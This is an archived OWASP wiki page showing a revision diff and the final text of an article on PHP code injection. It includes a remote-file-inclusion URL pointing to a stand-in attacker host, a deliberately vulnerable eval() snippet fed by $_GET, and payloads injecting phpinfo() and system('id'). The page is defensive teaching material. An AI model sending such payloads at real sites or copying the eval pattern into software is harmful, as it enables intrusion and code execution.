This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Code Injection"

From OWASP
Jump to: navigation, search
m
 
(11 intermediate revisions by 5 users not shown)
Line 2: Line 2:
 
<br>
 
<br>
 
[[Category:OWASP ASDR Project]]
 
[[Category:OWASP ASDR Project]]
[[ASDR Table of Contents]]__TOC__
+
 
 +
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''
  
 
==Description==
 
==Description==
 +
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
  
Code Injection is the general name for a lot of types of attacks which depend on inserting code, which is interprated by the application. Such an attack may be be performed by adding strings of characters into a cookie or argument values in the URI. This attack makes use of lack of accurate input/output data validation, for example:
+
* allowed characters (standard regular expressions classes or custom)
 
+
* data format
- class of allowed characters (standard regular expressions classes or custom)
+
* amount of expected data
 
 
- data format
 
  
- amount of expected data
+
Code Injection differs from [[Command Injection]] in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
 
 
- for numerical input, its values
 
 
 
 
 
Code Injection and [[Command Injection]] are measures used to achive simmilar goals. The concept of Code Injection is to add malicious code into an application, which then will be executed. Added code is a part of the application itself. It's not external code which is executed, like it would be in Command Injection.
 
  
 
==Risk Factors==
 
==Risk Factors==
TBD
+
* These types of vulnerabilities can range from very hard to find, to easy to find
[[Category:FIXME|need content here]]
+
* If found, are usually moderately hard to exploit, depending of scenario
 +
* If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability
  
 
==Examples ==
 
==Examples ==
Line 27: Line 23:
 
'''Example 1'''
 
'''Example 1'''
  
If a site uses the include() fucntion, which operates on variables sent with the GET method, and there is no validation performed on them, then the attacker may try to execute different code than author of the code had in mind.
+
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
  
The URL below displays information about how to contact with the testsite company.
+
The URL below passes a page name to the include() function.
  
 
http://testsite.com/index.php?page=contact.php
 
http://testsite.com/index.php?page=contact.php
  
Below the altered code is code from http://evilsite.com/evilcode.php. The script "evilcode.php" may contain, for example, a phpinfo() function, which is useful for gaining information about the configuration of the environment in which the web service runs.
+
The file "evilcode.php" may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute his PHP code using the following request:
  
 
http://testsite.com/?page=http://evilsite.com/evilcode.php
 
http://testsite.com/?page=http://evilsite.com/evilcode.php
 
One condition must be satisfied for this example to be successful, namely the web server configuration must allow for including files in the "http://" notation.
 
 
  
 
'''Example 2'''
 
'''Example 2'''
  
When a programmer uses the eval() function and operates on the data inside it, and these data may be altered by the attacker, then it's only one step closer to Code Injection.
+
When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.
  
 
+
The example below shows a dangerous way to use the eval() function:
The example below shows how to use the eval() function:
 
  
 
<pre>
 
<pre>
Line 53: Line 45:
 
</pre>
 
</pre>
  
The code above which smells like a rose may be used to perform a Code Injection attack.
+
As there is no input validation, the code above is vulnerable to a Code Injection attack.
  
E.g. passing in the URI /index.php?arg=1; phpinfo()
+
For example:
 
+
<pre>
 
+
/index.php?arg=1; phpinfo()
Exploiting bugs like these, the attacker doesn't have to limit himself only to a Code Injection attack. The attacker may tempt himself to use Command Injection technique, for example.
+
</pre>
 +
While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:
  
 
<pre>
 
<pre>
/index.pho?arg=1; system('id')
+
/index.php?arg=1; system('id')
 
</pre>
 
</pre>
  
 
==Related [[Threat Agents]]==
 
==Related [[Threat Agents]]==
[[Category:FIXME|need links]]
+
* [[:Category: Internet_attacker]]
* TBD
+
* [[Internal_software_developer]]
  
 
==Related [[Attacks]]==
 
==Related [[Attacks]]==
Line 84: Line 77:
  
 
==References==
 
==References==
* TBD
+
* [http://cwe.mitre.org/data/definitions/77.html CWE-77: Command Injection]
[[Category:FIXME|need links]]
+
* [http://cwe.mitre.org/data/definitions/78.html CWE-78: OS Command Injection]
 +
* [http://cwe.mitre.org/data/definitions/77.html CWE-89: SQL Injection]
  
 
[[Category:Injection]]
 
[[Category:Injection]]
 
[[Category:Attack]]
 
[[Category:Attack]]
 
[[Category:Injection Attack]]
 
[[Category:Injection Attack]]

Latest revision as of 16:34, 31 December 2013

This is an Attack. To view all attacks, please see the Attack Category page.


Last revision (mm/dd/yy): 12/31/2013

Description

Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:

  • allowed characters (standard regular expressions classes or custom)
  • data format
  • amount of expected data

Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

Risk Factors

  • These types of vulnerabilities can range from very hard to find, to easy to find
  • If found, are usually moderately hard to exploit, depending of scenario
  • If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability

Examples

Example 1

If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.

The URL below passes a page name to the include() function.

http://testsite.com/index.php?page=contact.php

The file "evilcode.php" may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute his PHP code using the following request:

http://testsite.com/?page=http://evilsite.com/evilcode.php

Example 2

When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.

The example below shows a dangerous way to use the eval() function:

$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");

As there is no input validation, the code above is vulnerable to a Code Injection attack.

For example:

/index.php?arg=1; phpinfo()

While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:

/index.php?arg=1; system('id')

Related Threat Agents

Related Attacks

Related Vulnerabilities

Related Controls

References